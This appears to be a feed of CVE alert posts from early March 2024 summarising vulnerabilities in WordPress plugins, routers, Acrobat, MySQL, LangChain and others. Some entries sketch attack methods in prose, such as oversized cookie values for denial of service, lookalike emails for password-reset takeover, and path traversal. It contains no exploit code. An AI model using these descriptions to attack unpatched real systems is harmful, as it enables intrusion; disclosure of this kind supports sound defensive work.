| 2024-03-03 00:37:26 |
🚨 CVE-2024-2133A vulnerability, which was classified as problematic, was found in Bdtask Isshue Multi Store eCommerce Shopping Cart Solution 4.0. This affects an unknown part of the file /dashboard/Cinvoice/manage_invoice of the component Manage Sale Page. The manipulation of the argument Title leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255495.🎖@cveNotify |
|
| 2024-03-03 00:37:25 |
🚨 CVE-2024-23743Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeClilnspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment."🎖@cveNotify |
|
| 2024-03-02 22:37:24 |
🚨 CVE-2022-48627In the Linux kernel, the following vulnerability has been resolved:vt: fix memory overlapping when deleting chars in the bufferA memory overlapping copy occurs when deleting a long line. This memoryoverlapping copy can cause data corruption when scr_memcpyw is optimizedto memcpy because memcpy does not ensure its behavior if the destinationbuffer overlaps with the source buffer. The line buffer is not alwaysbroken, because the memcpy utilizes the hardware acceleration, whoseresult is not deterministic.Fix this problem by using replacing the scr_memcpyw with scr_memmovew.🎖@cveNotify |
|
| 2024-03-02 13:37:24 |
🚨 CVE-2024-1398The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘heading_title_tag’ and ’heading_sub_title_tag’ parameters in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-02 12:37:25 |
🚨 CVE-2024-0611The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slides callback functionality in all versions up to, and including, 3.9.5. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-03-02 12:37:24 |
🚨 CVE-2023-6326The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.9.3. This is due to missing or incorrect nonce validation on the 'process_bulk_action' function. This makes it possible for unauthenticated attackers to duplicate or delete arbitrary sliders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-02 10:37:24 |
🚨 CVE-2024-0378The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-02 09:37:24 |
🚨 CVE-2024-2072A vulnerability, which was classified as problematic, was found in SourceCodester Flashcard Quiz App 1.0. This affects an unknown part of the file /endpoint/update-flashcard.php. The manipulation of the argument question/answer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255387.🎖@cveNotify |
|
| 2024-03-02 08:37:24 |
🚨 CVE-2024-1775The Nextend Social Login and Register plugin for WordPress is vulnerable to a self-based Reflected Cross-Site Scripting via the ‘error_description’ parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers, with access to a subscriber-level account, to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: This vulnerability can be successfully exploited on a vulnerable WordPress instance against an OAuth pre-authenticated higher-level user (e.g., administrator) by leveraging a cross-site request forgery in conjunction with a certain social engineering technique to achieve a critical impact scenario (cross-site scripting to administrator-level account creation). However, successful exploitation requires "Debug mode" to be enabled in the plugin's "Global Settings".🎖@cveNotify |
|
| 2024-03-02 07:37:24 |
🚨 CVE-2024-1592The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.6. This is due to missing or incorrect nonce validation on the process_delete function in class-DNSMPD.php. This makes it possible for unauthenticated attackers to delete GDPR data requests via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-02 03:37:25 |
🚨 CVE-2024-25064Due to insufficient server-side validation, an attacker with login privileges could access certain resources that the attacker should not have access to by changing parameter values.🎖@cveNotify |
|
| 2024-03-02 03:37:24 |
🚨 CVE-2024-25063Due to insufficient server-side validation, a successful exploit of this vulnerability could allow an attacker to gain access to certain URLs that the attacker should not have access to.🎖@cveNotify |
|
| 2024-03-02 02:37:24 |
🚨 CVE-2024-24814mod_auth_openidc is an OpenID Certified™ authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In affected versions missing input validation on mod_auth_openidc_session_chunks cookie value makes the server vulnerable to a denial of service (DoS) attack. An internal security audit has been conducted and the reviewers found that if they manipulated the value of the mod_auth_openidc_session_chunks cookie to a very large integer, like 99999999, the server struggles with the request for a long time and finally gets back with a 500 error. Making a few requests of this kind caused our server to become unresponsive. Attackers can craft requests that would make the server work very hard (and possibly become unresponsive) and/or crash with minimal effort. This issue has been addressed in version 2.4.15.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-03-01 23:37:32 |
🚨 CVE-2024-24511Cross Site Scripting vulnerability in Pkp OJS v.3.4 allows an attacker to execute arbitrary code via the Input Title component.🎖@cveNotify |
|
| 2024-03-01 23:37:25 |
🚨 CVE-2024-20972Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-03-01 23:37:24 |
🚨 CVE-2023-26206An improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiNAC 9.4.0 - 9.4.2, 9.2.0 - 9.2.8, 9.1.0 - 9.1.10 and 7.2.0 allows an attacker to execute unauthorized code or commands via the name fields observed in the policy audit logs.🎖@cveNotify |
|
| 2024-03-01 23:07:39 |
🚨 CVE-2024-20733Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an Improper Input Validation vulnerability that could lead to an application denial-of-service. An attacker could leverage this vulnerability to cause the application to crash, resulting in a denial of service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-03-01 23:07:32 |
🚨 CVE-2024-20728Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-03-01 23:07:31 |
🚨 CVE-2024-20727Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-03-01 23:07:27 |
🚨 CVE-2024-1378A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via nomad templates when configuring SMTP options. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .🎖@cveNotify |
|
| 2024-03-01 23:07:26 |
🚨 CVE-2024-21380Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-03-01 22:37:38 |
🚨 CVE-2024-2068A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/update-computer.php. The manipulation of the argument model leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255383.🎖@cveNotify |
|
| 2024-03-01 22:37:31 |
🚨 CVE-2024-27140** UNSUPPORTED WHEN ASSIGNED **Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Archiva.This issue affects Apache Archiva: from 2.0.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. Alternatively, you could configure a HTTP proxy in front of your Archiva instance to only forward requests that do not have malicious characters in the URL.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-03-01 22:37:30 |
🚨 CVE-2024-27139** UNSUPPORTED WHEN ASSIGNED **Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover.This issue affects Apache Archiva: from 2.0.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-03-01 22:37:26 |
🚨 CVE-2024-1624An OS Command Injection vulnerability affecting documentation server on 3DEXPERIENCE from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x, SIMULIA Abaqus from Release 2022 through Release 2024, SIMULIA Isight from Release 2022 through Release 2024 and CATIA Composer from Release R2023 through Release R2024. A specially crafted HTTP request can lead to arbitrary command execution.🎖@cveNotify |
|
| 2024-03-01 22:37:25 |
🚨 CVE-2024-21379Microsoft Word Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-01 21:37:32 |
🚨 CVE-2024-22182A remote, unauthenticated attacker may be able to send crafted messages to the web server of the Commend WS203VICM causing the system to restart, interrupting service.🎖@cveNotify |
|
| 2024-03-01 21:37:25 |
🚨 CVE-2023-7243Industrial Control Systems Network Protocol Parsers (ICSNPP) - Ethercat Zeek Plugin versions d78dda6 and prior are vulnerable to out-of-bounds write while analyzing specific Ethercat datagrams. This could allow an attacker to cause arbitrary code execution.🎖@cveNotify |
|
| 2024-03-01 21:37:24 |
🚨 CVE-2023-7242Industrial Control Systems Network Protocol Parsers (ICSNPP) - Ethercat Zeek Plugin versions d78dda6 and prior are vulnerable to out-of-bounds read during the process of analyzing a specific Ethercat packet. This could allow an attacker to crash the Zeek process and leak some information in memory.🎖@cveNotify |
|
| 2024-03-01 20:37:25 |
🚨 CVE-2024-1174Previous versions of HP ThinPro (prior to HP ThinPro 8.0 SP 8) could potentially contain security vulnerabilities. HP has released HP ThinPro 8.0 SP 8, which includes updates to mitigate potential vulnerabilities.🎖@cveNotify |
|
| 2024-03-01 19:37:25 |
🚨 CVE-2024-2076A vulnerability was found in CodeAstro House Rental Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file booking.php/owner.php/tenant.php. The manipulation leads to missing authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255392.🎖@cveNotify |
|
| 2024-03-01 19:37:24 |
🚨 CVE-2024-1453In Sante DICOM Viewer Pro versions 14.0.3 and prior, a user must open a malicious DICOM file, which could allow a local attacker to disclose information or execute arbitrary code.🎖@cveNotify |
|
| 2024-03-01 18:37:26 |
🚨 CVE-2024-2075A vulnerability was found in SourceCodester Daily Habit Tracker 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /endpoint/update-tracker.php. The manipulation of the argument day leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255391.🎖@cveNotify |
|
| 2024-03-01 18:37:25 |
🚨 CVE-2024-27298parse-server is a Parse Server for Node.js / Express. This vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database. The vulnerability has been fixed in 6.5.0 and 7.0.0-alpha.20.🎖@cveNotify |
|
| 2024-03-01 16:37:44 |
🚨 CVE-2024-2070A vulnerability classified as problematic was found in SourceCodester FAQ Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /endpoint/add-faq.php. The manipulation of the argument question/answer leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255385 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-01 16:37:40 |
🚨 CVE-2024-2068A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/update-computer.php. The manipulation of the argument model leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255383.🎖@cveNotify |
|
| 2024-03-01 16:37:39 |
🚨 CVE-2024-27295Directus is a real-time API and App dashboard for managing SQL database content. The password reset mechanism of the Directus backend allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive comparisons. This vulnerability is fixed in version 10.8.3.🎖@cveNotify |
|
| 2024-03-01 16:37:35 |
🚨 CVE-2024-27139** UNSUPPORTED WHEN ASSIGNED **Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover.This issue affects Apache Archiva: from 2.0.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-03-01 16:37:34 |
🚨 CVE-2024-23120A maliciously crafted STP file in ASMIMPORT228A.dll when parsed throughAutodesk AutoCAD can force an Out-of-Bound Write. A malicious actor canleverage this vulnerability to cause a crash, write sensitive data, or executearbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-03-01 15:37:54 |
🚨 CVE-2024-2067A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/delete-computer.php. The manipulation of the argument computer leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255382 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-01 15:37:53 |
🚨 CVE-2024-2065A vulnerability was found in SourceCodester Barangay Population Monitoring System up to 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /endpoint/update-resident.php. The manipulation of the argument full_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255380.🎖@cveNotify |
|
| 2024-03-01 15:37:52 |
🚨 CVE-2024-0967A potential vulnerability has been identified in OpenText / Micro Focus ArcSight Enterprise Security Manager (ESM). The vulnerability could be remotely exploited.🎖@cveNotify |
|
| 2024-03-01 15:37:48 |
🚨 CVE-2023-50378Lack of proper input validation and constraint enforcement in Apache Ambari prior to 2.7.8 Impact : As it will be stored XSS, Could be exploited to perform unauthorized actions, varying from data access to session hijacking and delivering malicious payloads. Users are recommended to upgrade to version 2.7.8 which fixes this issue.🎖@cveNotify |
|
| 2024-03-01 15:37:47 |
🚨 CVE-2024-2064A vulnerability has been found in rahman SelectCours 1.0 and classified as problematic. Affected by this vulnerability is the function getCacheNames of the file CacheController.java of the component Template Handler. The manipulation of the argument fragment leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255379.🎖@cveNotify |
|
| 2024-03-01 15:37:46 |
🚨 CVE-2024-27570LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the generate_conf_router function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-03-01 15:37:41 |
🚨 CVE-2024-27568LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the apn_name_3g parameter in the setupEC20Apn function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-03-01 15:37:40 |
🚨 CVE-2024-24905Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.🎖@cveNotify |
|
| 2024-03-01 15:37:36 |
🚨 CVE-2024-24903Dell Secure Connect Gateway (SCG) Policy Manager, version 5.10+, contain a weak password recovery mechanism for forgotten passwords. An adjacent network low privileged attacker could potentially exploit this vulnerability, leading to unauthorized access to the application with privileges of the compromised account. The attacker could retrieve the reset password token without authorization and then perform the password change.🎖@cveNotify |
|
| 2024-03-01 15:37:35 |
🚨 CVE-2023-46950Cross Site Scripting vulnerability in Contribsys Sidekiq v.6.5.8 allows a remote attacker to obtain sensitive information via a crafted URL to the filter functions.🎖@cveNotify |
|
| 2024-03-01 14:07:58 |
🚨 CVE-2024-2009A vulnerability was found in Nway Pro 9. It has been rated as problematic. Affected by this issue is the function ajax_login_submit_form of the file login\index.php of the component Argument Handler. The manipulation of the argument rsargs[] leads to information exposure through error message. The attack may be launched remotely. VDB-255266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-01 14:07:57 |
🚨 CVE-2024-27660D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_41C488(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-03-01 14:07:56 |
🚨 CVE-2024-27659D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_42AF30(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-03-01 14:07:53 |
🚨 CVE-2024-27658D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_4484A8(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-03-01 14:07:52 |
🚨 CVE-2024-27656D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the Cookie parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input, and possibly remote code execution.🎖@cveNotify |
|
| 2024-03-01 14:07:51 |
🚨 CVE-2024-26548An issue in vivotek Network Camera v.FD8166A-VVTK-0204j allows a remote attacker to execute arbitrary code via a crafted payload to the upload_file.cgi component.🎖@cveNotify |
|
| 2024-03-01 14:07:47 |
🚨 CVE-2024-24246Heap Buffer Overflow vulnerability in qpdf 11.9.0 allows attackers to crash the application via the std::__shared_count() function at /bits/shared_ptr_base.h.🎖@cveNotify |
|
| 2024-03-01 14:07:46 |
🚨 CVE-2024-25180An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the path '/pdf'.🎖@cveNotify |
|
| 2024-03-01 14:07:45 |
🚨 CVE-2023-6132The vulnerability, if exploited, could allow a malicious entity with access to the file system to achieve arbitrary code execution and privilege escalation by tricking AVEVA Edge to load an unsafe DLL.🎖@cveNotify |
|
| 2024-03-01 13:37:33 |
🚨 CVE-2024-2062A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. This issue affects some unknown processing of the file /admin/edit_categories.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-01 13:37:32 |
🚨 CVE-2024-2061A vulnerability classified as critical was found in SourceCodester Petrol Pump Management Software 1.0. This vulnerability affects unknown code of the file /admin/edit_supplier.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255376.🎖@cveNotify |
|
| 2024-03-01 13:37:29 |
🚨 CVE-2024-2060A vulnerability classified as critical has been found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/app/login_crud.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255375.🎖@cveNotify |
|
| 2024-03-01 13:37:28 |
🚨 CVE-2024-24906Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability in Policy page. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery.🎖@cveNotify |
|
| 2024-03-01 12:37:28 |
🚨 CVE-2024-2059A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/app/service_crud.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-255374 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-01 12:37:27 |
🚨 CVE-2024-2057A vulnerability was found in Harrison Chase LangChain 0.1.9. It has been classified as critical. Affected is the function load_local in the library libs/community/langchain_community/retrievers/tfidf.py. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255372.🎖@cveNotify |
|
| 2024-03-01 11:37:37 |
🚨 CVE-2024-26280Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated Ops and Viewers users to view all information on audit logs, including dag names and usernames they were not permitted to view. With 2.8.2 and newer, Ops and Viewer users do not have audit log permission by default, they need to be explicitly granted permissions to see the logs. Only admin users have audit log permission by default.Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability🎖@cveNotify |
|
| 2024-03-01 11:37:36 |
🚨 CVE-2024-22457Dell Secure Connect Gateway 5.20 contains an improper authentication vulnerability during the SRS to SCG update path. A remote low privileged attacker could potentially exploit this vulnerability, leading to impersonation of the server through presenting a fake self-signed certificate and communicating with the remote server.🎖@cveNotify |
|
| 2024-03-01 10:37:25 |
🚨 CVE-2024-25972Initialization of a resource with an insecure default vulnerability in OET-213H-BTS1 sold in Japan by Atsumi Electric Co., Ltd. allows a network-adjacent unauthenticated attacker to configure and control the affected product.🎖@cveNotify |
|
| 2024-03-01 10:37:24 |
🚨 CVE-2024-1120The NextMove Lite – Thank You Page for WooCommerce and Finale Lite – Sales Countdown Timer & Discount for WooCommerce plugins for WordPress are vulnerable to unauthorized access of data due to a missing capability check on the download_tools_settings() function in all versions up to, and including, 2.17.0. This makes it possible for unauthenticated attackers to export system information that can aid attackers in an attack.🎖@cveNotify |
|
| 2024-03-01 09:37:34 |
🚨 CVE-2024-0692The SolarWinds Security Event Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an unauthenticated user to abuse SolarWinds’ service, resulting in remote code execution.🎖@cveNotify |
|
| 2024-03-01 06:37:27 |
🚨 CVE-2024-25386Directory Traversal vulnerability in DICOM® Connectivity Framework by laurelbridge before v.2.7.6b allows a remote attacker to execute arbitrary code via the format_logfile.pl file.🎖@cveNotify |
|
| 2024-03-01 06:37:26 |
🚨 CVE-2023-46009gifsicle-1.94 was found to have a floating point exception (FPE) vulnerability via resize_stream at src/xform.c.🎖@cveNotify |
|
| 2024-03-01 06:37:25 |
🚨 CVE-2023-44821Gifsicle through 1.94, if deployed in a way that allows untrusted input to affect Gif_Realloc calls, might allow a denial of service (memory consumption). NOTE: this has been disputed by multiple parties because the Gifsicle code is not commonly used for unattended operation in which new input arrives for a long-running process, does not ship with functionality to link it into another application as a library, and does not have realistic use cases in which an adversary controls the entire command line.🎖@cveNotify |
|
| 2024-03-01 05:37:24 |
🚨 CVE-2024-0446A maliciously crafted STP, CATPART or MODEL file in ASMKERN228A.dll whenparsed through Autodesk AutoCAD can force an Out-of-Bound Write. A maliciousactor can leverage this vulnerability to cause a crash, write sensitive data,or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-03-01 04:37:26 |
🚨 CVE-2024-21338Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-01 03:37:34 |
🚨 CVE-2023-50312IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.2 could provide weaker than expected security for outbound TLS connections caused by a failure to honor user configuration. IBM X-Force ID: 274711.🎖@cveNotify |
|
| 2024-03-01 03:37:33 |
🚨 CVE-2023-38366IBM Filenet Content Manager Component 5.5.8.0, 5.5.10.0, and 5.5.11.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 261115.🎖@cveNotify |
|
| 2024-03-01 03:37:32 |
🚨 CVE-2023-4886A sensitive information exposure vulnerability was found in foreman. Contents of tomcat's server.xml file, which contain passwords to candlepin's keystore and truststore, were found to be world readable.🎖@cveNotify |
|
| 2024-03-01 02:37:36 |
🚨 CVE-2023-50305IBM Engineering Requirements Management DOORS 9.7.2.7 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 273336.🎖@cveNotify |
|
| 2024-03-01 02:37:31 |
🚨 CVE-2023-28949IBM Engineering Requirements Management DOORS 9.7.2.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 251216.🎖@cveNotify |
|
| 2024-03-01 02:37:30 |
🚨 CVE-2023-4511BT SDP dissector infinite loop in Wireshark 4.0.0 to 4.0.7 and 3.6.0 to 3.6.15 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-03-01 02:37:25 |
🚨 CVE-2020-13576A code execution vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-03-01 02:37:24 |
🚨 CVE-2020-13574A denial-of-service vulnerability exists in the WS-Security plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-03-01 02:07:27 |
🚨 CVE-2023-29360Microsoft Streaming Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-01 01:37:27 |
🚨 CVE-2024-1941Delta Electronics CNCSoft-B versions 1.0.0.4 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-03-01 00:37:53 |
🚨 CVE-2024-2022A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/list_ipAddressPolicy.php. The manipulation of the argument GroupId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255301 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-01 00:37:52 |
🚨 CVE-2024-2021A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. Affected is an unknown function of the file /admin/list_localuser.php. The manipulation of the argument ResId leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255300. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-01 00:37:51 |
🚨 CVE-2024-0403Recipes version 1.5.10 allows arbitrary HTTP requests to be madethrough the server. This is possible because the application isvulnerable to SSRF.🎖@cveNotify |
|
| 2024-02-29 21:37:25 |
🚨 CVE-2023-33958notation is a CLI tool to sign and verify OCI artifacts and container images. An attacker who has compromised a registry and added a high number of signatures to an artifact can cause denial of service of services on the machine, if a user runs notation verify command on the same machine. The problem has been fixed in the release v1.0.0-rc.6. Users should upgrade their notation packages to v1.0.0-rc.6 or above. Users unable to upgrade may restrict container registries to a set of secure and trusted container registries.🎖@cveNotify |
|
| 2024-02-29 21:37:24 |
🚨 CVE-2023-25656notation-go is a collection of libraries for supporting Notation sign, verify, push, and pull of oci artifacts. Prior to version 1.0.0-rc.3, notation-go users will find their application using excessive memory when verifying signatures. The application will be killed, and thus availability is impacted. The problem has been patched in the release v1.0.0-rc.3. Some workarounds are available. Users can review their own trust policy file and check if the identity string contains `=#`. Meanwhile, users should only put trusted certificates in their trust stores referenced by their own trust policy files, and make sure the `authenticity` validation is set to `enforce`.🎖@cveNotify |
|
| 2024-02-29 18:37:26 |
🚨 CVE-2024-25180An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the path '/pdf'.🎖@cveNotify |
|
| 2024-02-29 18:37:25 |
🚨 CVE-2023-6132The vulnerability, if exploited, could allow a malicious entity with access to the file system to achieve arbitrary code execution and privilege escalation by tricking AVEVA Edge to load an unsafe DLL.🎖@cveNotify |
|
| 2024-02-29 18:07:25 |
🚨 CVE-2023-52485In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Wake DMCUB before sending a command[Why]We can hang in place trying to send commands when the DMCUB isn'tpowered on.[How]For functions that execute within a DC context or DC lock we canwrap the direct calls to dm_execute_dmub_cmd/list with code thatexits idle power optimizations and reallows once we're done withthe command submission on success.For DM direct submissions the DM will need to manage the enter/exitsequencing manually.We cannot invoke a DMCUB command directly within the DM executionhelper or we can deadlock.🎖@cveNotify |
|
| 2024-02-29 18:07:24 |
